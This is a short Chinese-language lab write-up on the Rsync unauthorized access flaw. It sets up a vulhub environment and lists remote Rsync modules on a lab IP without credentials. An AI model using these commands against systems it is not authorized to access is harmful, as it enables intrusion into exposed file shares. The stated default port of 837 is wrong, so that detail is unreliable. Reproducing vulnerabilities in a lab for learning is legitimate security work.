目录
1. 漏洞介绍及危害
Rsync(remote synchronize)是一个远程数据同步工具,可通过 LAN/WAN 快速同步多台主机间的文件,也可以同步本地硬盘中的不同目录。Rsync 默认允许匿名访问,如果在配置文件中没有相关的用户认证以及文件授权,就会触发隐患。Rsync 的默认端口为 837。
2. 漏洞复现
Rsync相关环境利用vulhub进行复现,vulhub安装教程请自行百度
cd /vulhub/rsync/common
docker-compose up -d
3. 未授权访问
#rsync rsync://{target_ip}/
rsync rsync://192.168.2.85/
rsync rsync://192.168.2.85/src